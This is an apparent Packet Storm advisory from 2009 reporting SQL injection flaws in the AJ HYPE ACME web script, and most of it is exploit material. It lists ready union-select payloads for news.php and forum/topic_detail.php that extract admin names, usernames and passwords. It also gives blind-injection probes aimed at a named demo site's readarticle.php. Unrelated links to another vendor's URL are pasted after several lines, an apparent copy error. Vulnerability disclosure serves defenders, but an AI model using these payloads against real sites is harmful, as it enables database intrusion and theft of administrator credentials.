AJ HYPE ACME SQL Injection

2009-07-30T00:00:00
ID PACKETSTORM:79843
Type packetstorm
Reporter MizoZ
Modified 2009-07-30T00:00:00

Description

                                        
                                            `/*  
  
AJ HYPE ACME (bSQLi/SQLi) Multiple Remote Vulnerabilities  
  
Discovered by : MizoZ  
Contact : mizozx@gmail.com  
  
Date : July 29 2009  
  
Greetings : Moudi , Zuka, All friends  
  
*/  
  
SQL Injection news.php (GET : id) :  
[HOST]/[PATH]/news.php?id=[SQL  
CODE]<http://www.softbizscripts.com/scripts/shoppingcart/browsecats.php?cid=%5BSQL>  
  
SQL CODE :  
null+union+select+1,2,concat(admin_name,0x3a,username,0x3a,admin_password),4,5+from+admin--<http://www.softbizscripts.com/scripts/shoppingcart/browsecats.php?cid=%5BSQL>  
  
-----------------------------  
  
SQL Injection topic_detail.php (GET : id) :  
[HOST]/[PATH]/forum/topic_detail.php?id=[SQL  
CODE]<http://www.softbizscripts.com/scripts/shoppingcart/browsecats.php?cid=%5BSQL>  
  
SQL CODE :  
null+union+select+1,2,3,concat(admin_name,0x3a,username,0x3a,admin_password),5,6,7,8+from+admin--<http://www.softbizscripts.com/scripts/shoppingcart/browsecats.php?cid=%5BSQL>  
  
ONLY IN ACME EXTENSION  
  
-----------------------------  
  
Blind SQL Injection readarticle.php (GET : artid)  
  
http://www.ajhyip.com/demo/acme/article/readarticle.php?artid=3+and+1=1--==>>  
TRUE  
http://www.ajhyip.com/demo/acme/article/readarticle.php?artid=3+and+1=0--==>>  
FALSE  
http://www.ajhyip.com/demo/acme/article/readarticle.php?artid=3+and+%28select%20@@version%29=5--==>>  
TRUE  
`